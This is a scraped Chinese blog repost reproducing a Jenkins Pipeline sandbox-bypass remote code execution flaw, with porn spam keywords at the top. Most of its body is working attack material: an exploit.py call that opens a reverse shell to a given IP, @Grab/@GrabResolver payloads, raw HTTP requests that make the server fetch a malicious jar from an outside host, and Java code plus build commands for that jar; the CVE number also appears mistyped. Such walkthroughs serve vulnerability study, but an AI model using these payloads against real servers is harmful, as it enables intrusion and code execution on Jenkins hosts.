国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

[漏洞復現(xiàn)] jenkins 遠程代碼執(zhí)行 (CVE-2019-100300)

這篇具有很好參考價值的文章主要介紹了[漏洞復現(xiàn)] jenkins 遠程代碼執(zhí)行 (CVE-2019-100300)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

一、簡介

擁有Overall/Read 權限的用戶可以繞過沙盒保護,在jenkins可以執(zhí)行任意代碼。此漏洞需要一個賬號密碼和一個存在的job。

Jenkins的pipeline主要是通過一個配置文件或者job里面的pipeline腳本配置來設定每個job的步驟. pipeline定義了幾乎所有要用到的流程, 比如執(zhí)行shell, 存檔, 生成測試報告, 發(fā)布報告等。Pipeline使開發(fā)者可以方便的去撰寫一些構建腳本以完成自動化的編譯、測試、發(fā)布,其中文名稱是流水線(工作流),幫助開發(fā)者精心地組織一個可以長期運行在多個節(jié)點上的任務。

為了檢查使用者撰寫的Pipeline Script有沒有語法上的錯誤,Jenkins提供了一個界面給使用者檢查自己的Pipeline腳本。通過將抽象語法樹(AST,Abstract Syntax Tree)轉換注釋(如@Grab)應用于源代碼單元,可以在腳本編譯階段繞過腳本安全沙箱保護,導致具有Overall/Read權限或能控制SCM中jenkinsfile或沙盒Pipeline共享庫內(nèi)容的用戶繞過沙盒保護,并在Jenkins服務器上執(zhí)行任意代碼。

利用轉換注釋@Grab、@GrabResolover可以寫入惡意的Jar文件到jenkins服務器,由于Pipeline是基于Groovy語法的,因此Jenkins使用了GroovyClassLoader.parseClass()來檢查Pipeline腳本語法的正確性,最終導致在編譯階段執(zhí)行了寫入到Jenkins服務器的惡意Jar文件。

二、影響版本

Pipeline: Declarative 插件 <= 1.3.4
Pipeline: Groovy 插 件 <= 2.61
Script Security 插 件 <= 1.49

三、復現(xiàn)

工具
vulfocus沒有提供賬號密碼,所以以下是在看別人復現(xiàn)的思路

登錄之后,創(chuàng)建一個job

執(zhí)行下面的語句利用

python exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "whoami"
反彈shell:

python exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/192.168.0.102/12345 0>&1"

不使用工具
驗證是否存在漏洞,利用dnslog,看目標是否請求了該地址
payload

@GrabConfig(disableChecksums=true)

@GrabResolver(name='test', root='http://9mdvs1.dnslog.cn')

@Grab(group='test.sec', module='test', version='1')

import Payload;

請求包

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27test%27,%20root=%27http://kv0bn5.dnslog.cn%27)%0A@Grab(group=%27test.sec%27,%20module=%27test%27,%20version=%271%27)%0Aimport%20Payload; HTTP/1.1

Host: host

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

查看dnslog記錄:
jenkins命令執(zhí)行漏洞,漏洞復現(xiàn),jenkins,運維
利用該漏洞命令執(zhí)行
1.創(chuàng)建一個java文件,保存為jkrce.java代碼如下:

public class jkrce {

  public jkrce() {

    try {

     String payload = "touch /tmp/test11111";

     String[] cmds = { "/bin/bash", "-c", payload };

     java.lang.Runtime.getRuntime().exec(cmds);

    } catch (Exception e) {

} 

}

}

2.創(chuàng)建文件夾META-INF/serverices/,編譯并寫jkrce類到META-INF/serverices/org.codehaus.groovy.plugins.Runners里,如下:

javac jkrce.java 

mkdir -p META-INF/services/   

echo jkrce > META-INF/services/org.codehaus.groovy.plugins.Runners 

jar cvf jenkins-1.jar ./      

3.在公網(wǎng)web服務器目錄里,創(chuàng)建路徑/tools/jenkins/1/ 這個路徑要與下一步中的路徑一致,并將上一步生成的jar文件放到該目錄下

mkdir /tools/jenkins/1/

4.發(fā)送請求,數(shù)據(jù)包如下,xxx.xxx.xxx.xxx替換成公網(wǎng)地址即可:

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27payload%27,root=%27http://xxx.xxx.xxx.xxx/%27)%0a@Grab(group=%27tools%27,module=%27jenkins%27,version=%271%27)%0aimport%20jkrce; HTTP/1.1

Host: host

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

jenkins命令執(zhí)行漏洞,漏洞復現(xiàn),jenkins,運維

四、修復

更新文章來源地址http://www.zghlxwxcb.cn/news/detail-570333.html

到了這里,關于[漏洞復現(xiàn)] jenkins 遠程代碼執(zhí)行 (CVE-2019-100300)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 漏洞復現(xiàn) CVE-2023-0297( pyload遠程代碼執(zhí)行漏洞 )

    在 addcrypted2() 函數(shù)中,對傳入的參數(shù) jk 解析后用 eval_js() 作為 JS 語句執(zhí)行。 利用 JS 中 pyimport 導入 OS 包,執(zhí)行系統(tǒng)命令(文件操作,進程管理),還可以利用 os.system() 執(zhí)行 shell 命令。 構建 payload 過程比較簡單,只要傳入所需的 package, crypted, jk, passwords 四個參數(shù)即可,這里

    2024年02月08日
    瀏覽(22)
  • PhpMyAdmin遠程執(zhí)行代碼漏洞復現(xiàn) (CVE-2016-5734)

    0x01 漏洞介紹 phpMyAdmin是phpMyAdmin團隊開發(fā)的一套免費的、基于Web的MySQL數(shù)據(jù)庫管理工具。該工具能夠創(chuàng)建和刪除數(shù)據(jù)庫,創(chuàng)建、刪除、修改數(shù)據(jù)庫表,執(zhí)行SQL腳本命令等。 phpMyAdmin 中存在安全漏洞,該漏洞源于程序沒有正確選擇分隔符來避免使用 preg_replace e 修飾符。 可借助特

    2024年02月11日
    瀏覽(18)
  • 復現(xiàn)CVE-2022-10270(向日葵遠程代碼執(zhí)行漏洞)

    復現(xiàn)CVE-2022-10270(向日葵遠程代碼執(zhí)行漏洞)

    目錄 引言 漏洞描述 影響版本: 原理: 環(huán)境搭建 手動復現(xiàn) 腳本復現(xiàn) 修復建議 ? ? ? ? 本文內(nèi)容僅供學習參考,若讀者利用本文內(nèi)容做出違法行為,筆者不提供擔保!?。?????????向日葵是一款免費的,集遠程控制電腦手機、遠程桌面連接、遠程開機、遠程管理、支持

    2024年02月07日
    瀏覽(22)
  • drupal遠程代碼執(zhí)行 (CVE-2018-7600)漏洞學習與復現(xiàn)

    drupal遠程代碼執(zhí)行 (CVE-2018-7600)漏洞學習與復現(xiàn)

    drupal是一個開源PHP管理系統(tǒng),架構使用的是php環(huán)境+mysql數(shù)據(jù)庫的環(huán)境配置。在 Drupal 6.x,7.x,8.x 系列的版本中,均存在遠程代碼執(zhí)行漏洞。該漏洞產(chǎn)生的原因在于Drupal對表單渲染時未進行嚴格的安全過濾,導致,攻擊者可以利用該漏洞攻擊Drupal系統(tǒng)的網(wǎng)站,執(zhí)行惡意代碼。 首

    2024年02月02日
    瀏覽(19)
  • 【漏洞復現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

    【漏洞復現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

    0x01 Microsoft Office Microsoft Office是由Microsoft(微軟)公司開發(fā)的一套辦公軟件套裝。常用組件有 Word、Excel、PowerPoint等。 0x02 漏洞簡介 該文檔使用 Word 遠程模板功能從遠程網(wǎng)絡服務器檢索 HTML 文件,該服務器使用 ms-msdt MSProtocol URI 方案加載代碼并執(zhí)行 PowerShell,禁用宏,仍能通過

    2024年02月05日
    瀏覽(19)
  • CVE-2018-0886-Microsoft Windows CredSSP 遠程執(zhí)行代碼漏洞復現(xiàn)
  • CVE-2022-21907 Microsoft Windows HTTP 協(xié)議棧遠程代碼執(zhí)行漏洞復現(xiàn)

    CVE-2022-21907 Microsoft Windows HTTP 協(xié)議棧遠程代碼執(zhí)行漏洞復現(xiàn)

    目錄 0x01 聲明: 0x02 簡介: 0x03 漏洞概述: 0x04 影響版本: 0x05 環(huán)境搭建: 下載: 開啟IIS: 0x06 漏洞復現(xiàn): 利用POC: 0x07 流量分析: 客戶端: 0x08 修復建議: ????????僅供學習參考使用,請勿用作違法用途,否則后果自負。 ????????Microsoft Windows HTTP 協(xié)議棧(HTTP.

    2024年02月03日
    瀏覽(16)
  • Windows支持診斷工具(MSDT)遠程代碼執(zhí)行漏洞:CVE-2022-30190學習及復現(xiàn)

    Windows支持診斷工具(MSDT)遠程代碼執(zhí)行漏洞:CVE-2022-30190學習及復現(xiàn)

    Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability對應的cve編號為CVE-2022-30190,其能夠在非管理員權限、禁用宏且在windows defender開啟的情況下繞過防護,達到上線的效果。 當從Word等應用程序使用 URL 協(xié)議調(diào)用 MSDT 時存在遠程執(zhí)行代碼漏洞,攻擊者通過制作惡意的

    2024年02月08日
    瀏覽(43)
  • 復現(xiàn)CVE-2021-44228-Apache Log4j2遠程代碼執(zhí)行漏洞

    復現(xiàn)CVE-2021-44228-Apache Log4j2遠程代碼執(zhí)行漏洞

    復現(xiàn)CVE-2021-44228-Apache Log4j2遠程代碼執(zhí)行漏洞 目錄 前言 漏洞原理 影響范圍 環(huán)境搭建漏洞復現(xiàn) 使用工具JNDIExploit-1.2-SNAPSHOT.jar 近期Apache Log4j2被暴露了一個嚴重的遠程代碼執(zhí)行安全漏洞(CVE-2021-44228),有嚴重的安全風險。Apache Log4j2是一款優(yōu)秀的Java日志框架, 被廣泛地應用在

    2024年02月05日
    瀏覽(28)
  • CVE-2022-30190分析以及復現(xiàn)和POC利用 //Microsoft Office MSDT 遠程代碼執(zhí)行漏洞

    CVE-2022-30190分析以及復現(xiàn)和POC利用 //Microsoft Office MSDT 遠程代碼執(zhí)行漏洞

    在微軟官方的介紹里,是從 Word 等調(diào)用應用程序使用 URL 協(xié)議調(diào)用 MSDT 時存在遠程執(zhí)行代碼漏洞。成功利用此漏洞的攻擊者可以使用調(diào)用應用程序的權限運行任意代碼。 意思是惡意 Word 文檔可以使用遠程模板功能從遠程服務器獲取 HTML 文件,并且 HTML 代碼可以使用 Microsoft 的

    2024年02月04日
    瀏覽(69)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包